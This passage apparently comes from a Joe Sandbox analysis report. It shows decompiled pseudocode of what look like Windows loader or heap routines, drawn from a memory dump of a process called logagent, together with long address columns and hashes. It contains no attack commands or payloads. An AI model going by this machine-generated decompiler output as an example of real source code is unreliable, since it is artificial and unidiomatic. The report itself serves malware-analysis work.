																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                              0x051cd5f2
                                              0x051cd5f5
                                              0x051cd5f5
                                              0x051cd5fd
                                              0x051cd600
                                              0x051cd60a
                                              0x051cd60d
                                              0x051cd617
                                              0x051cd61d
                                              0x051cd627
                                              0x051cd62e
                                              0x051cd911
                                              0x051cd913
                                              0x00000000
                                              0x051cd919
                                              0x051cd919
                                              0x051cd919
                                              0x051cd634
                                              0x051cd634
                                              0x051cd634
                                              0x051cd634
                                              0x051cd640
                                              0x051cd8bf
                                              0x00000000
                                              0x051cd646
                                              0x051cd646
                                              0x051cd64d
                                              0x051cd652
                                              0x0521b2fc
                                              0x0521b2fc
                                              0x0521b302
                                              0x0521b33b
                                              0x0521b341
                                              0x00000000
                                              0x0521b304
                                              0x0521b304
                                              0x0521b319
                                              0x0521b31e
                                              0x0521b324
                                              0x0521b326
                                              0x0521b332
                                              0x0521b347
                                              0x0521b34c
                                              0x0521b351
                                              0x0521b35a
                                              0x00000000
                                              0x0521b328
                                              0x0521b328
                                              0x00000000
                                              0x0521b328
                                              0x0521b326
                                              0x051cd658
                                              0x051cd658
                                              0x051cd65b
                                              0x051cd665
                                              0x00000000
                                              0x051cd66b
                                              0x051cd66b
                                              0x051cd66b
                                              0x051cd66b
                                              0x051cd66d
                                              0x051cd672
                                              0x051cd67a
                                              0x00000000
                                              0x00000000
                                              0x051cd680
                                              0x051cd686
                                              0x051cd8ce
                                              0x051cd8d4
                                              0x051cd8da
                                              0x051cd8dd
                                              0x051cd8dd
                                              0x051cd8e0
                                              0x051cd68c
                                              0x051cd691
                                              0x051cd69d
                                              0x051cd6a2
                                              0x051cd6a7
                                              0x051cd6b0
                                              0x051cd6b0
                                              0x051cd6b5
                                              0x051cd6e0
                                              0x051cd6b7
                                              0x051cd6b7
                                              0x051cd6b9
                                              0x051cd6b9
                                              0x051cd6bb
                                              0x051cd6bd
                                              0x051cd6ce
                                              0x051cd6d0
                                              0x051cd6d2
                                              0x0521b363
                                              0x0521b365
                                              0x00000000
                                              0x0521b36b
                                              0x00000000
                                              0x0521b36b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051cd6bf
                                              0x051cd6bf
                                              0x051cd6e5
                                              0x051cd6e7
                                              0x051cd6e9
                                              0x051cd6e9
                                              0x051cd6ec
                                              0x051cd6ec
                                              0x051cd6ef
                                              0x051cd6f5
                                              0x051cd6f9
                                              0x051cd6fb
                                              0x051cd6fd
                                              0x051cd701
                                              0x051cd703
                                              0x051cd70a
                                              0x051cd70a
                                              0x051cd70a
                                              0x051cd701
                                              0x051cd70d
                                              0x051cd710
                                              0x051cd710
                                              0x051cd6c1
                                              0x051cd6c1
                                              0x051cd6c1
                                              0x051cd6c6
                                              0x0521b36d
                                              0x0521b36f
                                              0x00000000
                                              0x0521b375
                                              0x0521b375
                                              0x0521b375
                                              0x00000000
                                              0x0521b375
                                              0x00000000
                                              0x051cd6cc
                                              0x051cd6d8
                                              0x051cd6d8
                                              0x051cd6d8
                                              0x00000000
                                              0x051cd6c6
                                              0x051cd6bf
                                              0x00000000
                                              0x051cd6da
                                              0x051cd6da
                                              0x051cd716
                                              0x051cd71b
                                              0x051cd720
                                              0x051cd726
                                              0x051cd726
                                              0x051cd72d
                                              0x00000000
                                              0x051cd733
                                              0x051cd739
                                              0x051cd742
                                              0x051cd750
                                              0x051cd758
                                              0x051cd764
                                              0x051cd776
                                              0x051cd77a
                                              0x051cd783
                                              0x051cd928
                                              0x051cd92c
                                              0x051cd93d
                                              0x051cd944
                                              0x051cd94f
                                              0x051cd954
                                              0x051cd956
                                              0x051cd95f
                                              0x051cd961
                                              0x051cd973
                                              0x051cd973
                                              0x051cd956
                                              0x051cd944
                                              0x051cd92c
                                              0x051cd78b
                                              0x0521b394
                                              0x051cd791
                                              0x051cd798
                                              0x0521b3a3
                                              0x0521b3bb
                                              0x0521b3bb
                                              0x051cd7a5
                                              0x051cd866
                                              0x051cd870
                                              0x051cd884
                                              0x051cd892
                                              0x051cd898
                                              0x051cd89e
                                              0x051cd8a0
                                              0x051cd8a6
                                              0x051cd8ac
                                              0x051cd8ae
                                              0x051cd8b4
                                              0x051cd8b4
                                              0x051cd8ae
                                              0x051cd7a5
                                              0x051cd78b
                                              0x051cd7b1
                                              0x0521b3c5
                                              0x0521b3c5
                                              0x051cd7c3
                                              0x051cd7ca
                                              0x051cd7e5
                                              0x051cd7eb
                                              0x051cd8eb
                                              0x051cd8ed
                                              0x00000000
                                              0x051cd8f3
                                              0x051cd8f3
                                              0x051cd8f3
                                              0x00000000
                                              0x051cd8ed
                                              0x051cd7cc
                                              0x051cd7cc
                                              0x051cd7d2
                                              0x00000000
                                              0x051cd7d4
                                              0x051cd7d4
                                              0x051cd7d7
                                              0x051cd7df
                                              0x0521b3d4
                                              0x0521b3d9
                                              0x0521b3dc
                                              0x0521b3dc
                                              0x0521b3df
                                              0x0521b3e2
                                              0x0521b468
                                              0x0521b46d
                                              0x0521b46f
                                              0x0521b46f
                                              0x0521b475
                                              0x051cd8f8
                                              0x051cd8f9
                                              0x051cd8fd
                                              0x0521b3e8
                                              0x0521b3e8
                                              0x0521b3eb
                                              0x0521b3ed
                                              0x00000000
                                              0x0521b3ef
                                              0x0521b3ef
                                              0x0521b3f1
                                              0x0521b3f4
                                              0x0521b3fe
                                              0x0521b404
                                              0x0521b409
                                              0x0521b40e
                                              0x0521b410
                                              0x0521b410
                                              0x0521b414
                                              0x0521b414
                                              0x0521b41b
                                              0x0521b420
                                              0x0521b423
                                              0x0521b425
                                              0x0521b427
                                              0x0521b42a
                                              0x0521b42d
                                              0x0521b42d
                                              0x0521b42a
                                              0x0521b432
                                              0x0521b436
                                              0x0521b438
                                              0x0521b43b
                                              0x0521b43b
                                              0x0521b449
                                              0x0521b44e
                                              0x0521b454
                                              0x0521b458
                                              0x0521b458
                                              0x0521b45d
                                              0x00000000
                                              0x0521b45d
                                              0x0521b3ed
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051cd7df
                                              0x051cd7d2
                                              0x051cd7ca
                                              0x0521b37c
                                              0x0521b37e
                                              0x0521b385
                                              0x0521b38a
                                              0x00000000
                                              0x0521b38a
                                              0x051cd742
                                              0x051cd7f1
                                              0x051cd7f8
                                              0x0521b49b
                                              0x0521b49b
                                              0x051cd800
                                              0x051cd837
                                              0x051cd843
                                              0x051cd845
                                              0x051cd847
                                              0x051cd84a
                                              0x051cd84b
                                              0x051cd84e
                                              0x051cd857
                                              0x051cd802
                                              0x051cd802
                                              0x051cd80d
                                              0x00000000
                                              0x051cd818
                                              0x051cd818
                                              0x051cd824
                                              0x051cd831
                                              0x0521b4a5
                                              0x0521b4ab
                                              0x0521b4b3
                                              0x0521b4b8
                                              0x0521b4bb
                                              0x00000000
                                              0x0521b4c1
                                              0x0521b4c1
                                              0x0521b4c8
                                              0x00000000
                                              0x0521b4ce
                                              0x0521b4d4
                                              0x0521b4e1
                                              0x0521b4e3
                                              0x0521b4e5
                                              0x00000000
                                              0x0521b4eb
                                              0x0521b4f0
                                              0x0521b4f2
                                              0x051cdac9
                                              0x051cdacc
                                              0x051cdacf
                                              0x051cdad1
                                              0x051cdd78
                                              0x051cdd78
                                              0x051cdcf2
                                              0x00000000
                                              0x051cdad7
                                              0x051cdad9
                                              0x051cdadb
                                              0x00000000
                                              0x00000000
                                              0x051cdae1
                                              0x051cdae1
                                              0x051cdae4
                                              0x051cdae6
                                              0x0521b4f9
                                              0x0521b4f9
                                              0x0521b500
                                              0x051cdaec
                                              0x051cdaec
                                              0x051cdaf5
                                              0x051cdaf8
                                              0x051cdafb
                                              0x051cdb03
                                              0x051cdb11
                                              0x051cdb16
                                              0x051cdb19
                                              0x051cdb1b
                                              0x0521b52c
                                              0x0521b531
                                              0x0521b534
                                              0x051cdb21
                                              0x051cdb21
                                              0x051cdb24
                                              0x051cdcd9
                                              0x051cdce2
                                              0x051cdce5
                                              0x051cdd6a
                                              0x051cdd6d
                                              0x00000000
                                              0x051cdd73
                                              0x0521b51a
                                              0x0521b51c
                                              0x0521b51f
                                              0x0521b524
                                              0x00000000
                                              0x0521b524
                                              0x051cdce7
                                              0x051cdce7
                                              0x051cdce7
                                              0x00000000
                                              0x051cdce7
                                              0x00000000
                                              0x051cdb2a
                                              0x051cdb2c
                                              0x051cdb31
                                              0x051cdb33
                                              0x051cdb36
                                              0x051cdb39
                                              0x051cdb3b
                                              0x051cdb66
                                              0x051cdb66
                                              0x051cdb3d
                                              0x051cdb3d
                                              0x051cdb3e
                                              0x051cdb46
                                              0x051cdb47
                                              0x051cdb49
                                              0x051cdb4c
                                              0x051cdb53
                                              0x051cdb55
                                              0x051cdb58
                                              0x051cdb5a
                                              0x0521b50a
                                              0x0521b50f
                                              0x0521b512
                                              0x051cdb60
                                              0x051cdb60
                                              0x051cdb63
                                              0x051cdb63
                                              0x00000000
                                              0x051cdb63
                                              0x051cdb5a
                                              0x051cdb3b
                                              0x051cdb24
                                              0x051cdb69
                                              0x051cdb69
                                              0x051cdb6c
                                              0x051cdb6f
                                              0x051cdb74
                                              0x0521b557
                                              0x0521b557
                                              0x0521b55e
                                              0x051cdb7a
                                              0x051cdb7c
                                              0x051cdb7f
                                              0x051cdb82
                                              0x051cdb85
                                              0x00000000
                                              0x051cdb8b
                                              0x051cdb8b
                                              0x051cdb8d
                                              0x051cdb9b
                                              0x051cdb9b
                                              0x051cdb9d
                                              0x051cdba0
                                              0x051cdba2
                                              0x051cdba4
                                              0x051cdba7
                                              0x051cdba9
                                              0x051cdbae
                                              0x051cdbae
                                              0x051cdbb1
                                              0x051cdbb4
                                              0x051cdbb4
                                              0x051cdbb7
                                              0x051cdbba
                                              0x051cdcd2
                                              0x051cdcd4
                                              0x00000000
                                              0x051cdbc0
                                              0x051cdbc0
                                              0x051cdbd2
                                              0x051cdbd7
                                              0x051cdbda
                                              0x051cdbdd
                                              0x051cdbdf
                                              0x00000000
                                              0x051cdbe5
                                              0x051cdbe5
                                              0x051cdbee
                                              0x051cdbf1
                                              0x0521b541
                                              0x0521b544
                                              0x00000000
                                              0x0521b546
                                              0x0521b546
                                              0x00000000
                                              0x0521b546
                                              0x051cdbf7
                                              0x051cdbf7
                                              0x051cdbfd
                                              0x051cdbfd
                                              0x051cdbff
                                              0x051cdc0b
                                              0x051cdc15
                                              0x051cdc1b
                                              0x051cdc1d
                                              0x051cdc21
                                              0x051cdc21
                                              0x051cdc23
                                              0x051cdc23
                                              0x051cdc26
                                              0x051cdc29
                                              0x051cdc2b
                                              0x00000000
                                              0x00000000
                                              0x051cdc31
                                              0x051cdc34
                                              0x051cdc36
                                              0x051cdcbf
                                              0x051cdcbf
                                              0x051cdcc2
                                              0x00000000
                                              0x051cdc3c
                                              0x051cdc41
                                              0x051cdc43
                                              0x00000000
                                              0x051cdc45
                                              0x051cdc45
                                              0x051cdc47
                                              0x00000000
                                              0x051cdc4d
                                              0x051cdc4d
                                              0x051cdc50
                                              0x051cdc52
                                              0x051cdc55
                                              0x051cdcfa
                                              0x051cdcfe
                                              0x051cdd08
                                              0x051cdd0a
                                              0x051cdd0c
                                              0x00000000
                                              0x051cdd12
                                              0x051cdd15
                                              0x051cdd2d
                                              0x051cdd2f
                                              0x051cdd32
                                              0x051cdd35
                                              0x00000000
                                              0x051cdd35
                                              0x051cdc5b
                                              0x051cdc5b
                                              0x051cdc5e
                                              0x051cdc61
                                              0x051cdc64
                                              0x051cdc67
                                              0x051cdc67
                                              0x051cdc6a
                                              0x051cdc6c
                                              0x051cdc8e
                                              0x051cdc8e
                                              0x051cdc91
                                              0x051cdc93
                                              0x051cdcce
                                              0x051cdcce
                                              0x051cdc95
                                              0x051cdc9c
                                              0x051cdc6e
                                              0x051cdc72
                                              0x051cdc75
                                              0x051cdc77
                                              0x051cdc79
                                              0x0521b551
                                              0x0521b551
                                              0x00000000
                                              0x051cdc7f
                                              0x051cdc7f
                                              0x051cdc81
                                              0x00000000
                                              0x051cdc83
                                              0x051cdc86
                                              0x051cdc88
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051cdc88
                                              0x051cdc81
                                              0x051cdc79
                                              0x051cdc6c
                                              0x051cdc55
                                              0x051cdc47
                                              0x051cdc43
                                              0x00000000
                                              0x051cdc36
                                              0x051cdc23
                                              0x00000000
                                              0x051cdbff
                                              0x051cdbf1
                                              0x051cdbdf
                                              0x051cdb8f
                                              0x051cdb92
                                              0x051cdb95
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051cdb95
                                              0x051cdb8d
                                              0x051cdb85
                                              0x051cdb74
                                              0x051cdc9f
                                              0x051cdca2
                                              0x051cdcb0
                                              0x051cdcb0
                                              0x051cdad1
                                              0x0521b4e5
                                              0x0521b4c8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051cd831
                                              0x051cd80d
                                              0x00000000
                                              0x051cd800
                                              0x0521b47f
                                              0x0521b485
                                              0x00000000
                                              0x0521b485
                                              0x051cd665
                                              0x051cd652
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 42b0babd3945987685cb9f5bc9f591fa5d3504abfd96c7484266a4f2dd22580b
                                              • Instruction ID: 466ea7f8ed46b6fbe7ef3c2741aa298bbaefbd12c7ace668cf90ed92592e5b27
                                              • Opcode Fuzzy Hash: 42b0babd3945987685cb9f5bc9f591fa5d3504abfd96c7484266a4f2dd22580b
                                              • Instruction Fuzzy Hash: 80E1D030B0439A8FDB34DF24D898B7ABBB2BF55304F0541EDD80A97291DB75A981CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051C849B Relevance: .3, Instructions: 290COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E051C849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x528f9c0);
				E0520D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x52a7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E051CCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E051D2280( *[fs:0x30], 0x52a8550);
						_t139 =  *0x52a7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E051EF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E051CFFB0(_t193, _t235, 0x52a8550);
								L5:
								return E0520D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E051B1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x52a7b9c; // 0x0
							_t235 = L051D4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x52a7b10; // 0x9
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E051EA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E051CFFB0(_t193, _t235, 0x52a8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L051D77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L051D77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x52a7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x52a7b10; // 0x9
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E051F37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x52a7b9c; // 0x0
									_t214 = L051D4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E051F37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x52a7b10 =  *0x52a7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x52a7b04 =  *0x52a7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L051D77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L051D77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x52a7b08 =  *0x52a7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E051F57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E051FF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L051D77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E051EA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L051D77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E051F96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                              0x051c849b
                                              0x051c849b
                                              0x051c849b
                                              0x051c849b
                                              0x051c849d
                                              0x051c84a2
                                              0x051c84a7
                                              0x051c84b1
                                              0x051c84d8
                                              0x00000000
                                              0x051c84b3
                                              0x051c84c4
                                              0x051c84c9
                                              0x051c84cd
                                              0x051c84cf
                                              0x051c84cf
                                              0x051c84d6
                                              0x051c84e6
                                              0x051c84e9
                                              0x051c84ec
                                              0x051c84ef
                                              0x051c84f2
                                              0x051c84f4
                                              0x051c84fc
                                              0x051c8501
                                              0x051c8506
                                              0x051c8509
                                              0x051c86e0
                                              0x051c86e5
                                              0x051c86e8
                                              0x051c86ed
                                              0x051c86f0
                                              0x051c86f2
                                              0x05219afd
                                              0x05219b02
                                              0x051c84da
                                              0x051c84df
                                              0x051c84df
                                              0x051c86fa
                                              0x051c86fd
                                              0x051c86fe
                                              0x051c8701
                                              0x051c8706
                                              0x051c8709
                                              0x051c870b
                                              0x00000000
                                              0x00000000
                                              0x051c8711
                                              0x051c8725
                                              0x051c8727
                                              0x051c872a
                                              0x051c872c
                                              0x05219af0
                                              0x05219af5
                                              0x051c8732
                                              0x051c8732
                                              0x051c8732
                                              0x051c8735
                                              0x051c8737
                                              0x051c8515
                                              0x051c8515
                                              0x051c8518
                                              0x051c851d
                                              0x051c8523
                                              0x051c8527
                                              0x051c852b
                                              0x051c8537
                                              0x051c8539
                                              0x051c853c
                                              0x051c853e
                                              0x051c868c
                                              0x051c8691
                                              0x051c8699
                                              0x051c869b
                                              0x051c8744
                                              0x051c8748
                                              0x051c86a1
                                              0x051c86a1
                                              0x051c86a1
                                              0x051c86a4
                                              0x051c86a8
                                              0x05219bdf
                                              0x05219bdf
                                              0x051c86ae
                                              0x051c86b0
                                              0x00000000
                                              0x051c86b6
                                              0x00000000
                                              0x05219be9
                                              0x051c86b0
                                              0x051c8544
                                              0x051c854a
                                              0x051c854d
                                              0x051c8551
                                              0x051c876e
                                              0x051c8778
                                              0x051c877b
                                              0x051c8780
                                              0x051c8557
                                              0x051c8557
                                              0x051c855d
                                              0x051c855d
                                              0x051c856b
                                              0x051c856e
                                              0x051c8570
                                              0x051c8573
                                              0x051c8576
                                              0x051c8576
                                              0x051c8579
                                              0x051c857b
                                              0x00000000
                                              0x00000000
                                              0x051c8581
                                              0x051c85a0
                                              0x051c85a2
                                              0x051c85a5
                                              0x051c85a7
                                              0x05219b1b
                                              0x05219b1b
                                              0x051c862e
                                              0x051c862e
                                              0x051c8631
                                              0x051c8631
                                              0x051c8634
                                              0x051c8636
                                              0x051c8669
                                              0x051c8669
                                              0x051c866b
                                              0x05219bbf
                                              0x05219bc4
                                              0x05219bc8
                                              0x05219bce
                                              0x05219bce
                                              0x051c8671
                                              0x051c8671
                                              0x051c8674
                                              0x051c8676
                                              0x05219bae
                                              0x05219bae
                                              0x051c8676
                                              0x051c867c
                                              0x051c867e
                                              0x051c8688
                                              0x051c8688
                                              0x00000000
                                              0x051c867e
                                              0x051c8638
                                              0x051c8638
                                              0x051c863b
                                              0x051c863e
                                              0x051c863f
                                              0x051c8642
                                              0x051c8645
                                              0x051c8648
                                              0x051c864d
                                              0x05219b69
                                              0x05219b6e
                                              0x05219b7b
                                              0x05219b81
                                              0x05219b85
                                              0x05219b89
                                              0x05219ba7
                                              0x05219b8b
                                              0x05219b91
                                              0x05219b9a
                                              0x05219b9f
                                              0x05219b9f
                                              0x051c8788
                                              0x051c878d
                                              0x051c8763
                                              0x051c8763
                                              0x051c8766
                                              0x00000000
                                              0x051c8766
                                              0x05219b70
                                              0x00000000
                                              0x05219b70
                                              0x051c8656
                                              0x051c865a
                                              0x051c865c
                                              0x051c8752
                                              0x051c8756
                                              0x00000000
                                              0x00000000
                                              0x051c875e
                                              0x00000000
                                              0x051c875e
                                              0x051c8662
                                              0x051c8662
                                              0x051c8662
                                              0x051c8666
                                              0x00000000
                                              0x051c8666
                                              0x051c85b7
                                              0x051c85b9
                                              0x051c85bc
                                              0x051c85bf
                                              0x051c85cc
                                              0x051c85d1
                                              0x051c85d4
                                              0x051c85db
                                              0x051c85de
                                              0x051c85e0
                                              0x05219b5f
                                              0x00000000
                                              0x05219b5f
                                              0x051c85e6
                                              0x051c85ea
                                              0x051c86c3
                                              0x051c86c5
                                              0x051c86c8
                                              0x051c86ca
                                              0x05219b16
                                              0x00000000
                                              0x05219b16
                                              0x051c86d6
                                              0x051c85f6
                                              0x051c85f6
                                              0x051c85f9
                                              0x051c8602
                                              0x051c8606
                                              0x051c860a
                                              0x051c860b
                                              0x051c860e
                                              0x051c8611
                                              0x00000000
                                              0x051c8611
                                              0x051c85f3
                                              0x00000000
                                              0x051c85f3
                                              0x051c8619
                                              0x051c861e
                                              0x051c861e
                                              0x051c8621
                                              0x051c8622
                                              0x051c8623
                                              0x051c8625
                                              0x051c862c
                                              0x00000000
                                              0x051c873d
                                              0x00000000
                                              0x051c873d
                                              0x051c8737
                                              0x051c850f
                                              0x051c8512
                                              0x00000000
                                              0x051c8512
                                              0x00000000
                                              0x051c84d6

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
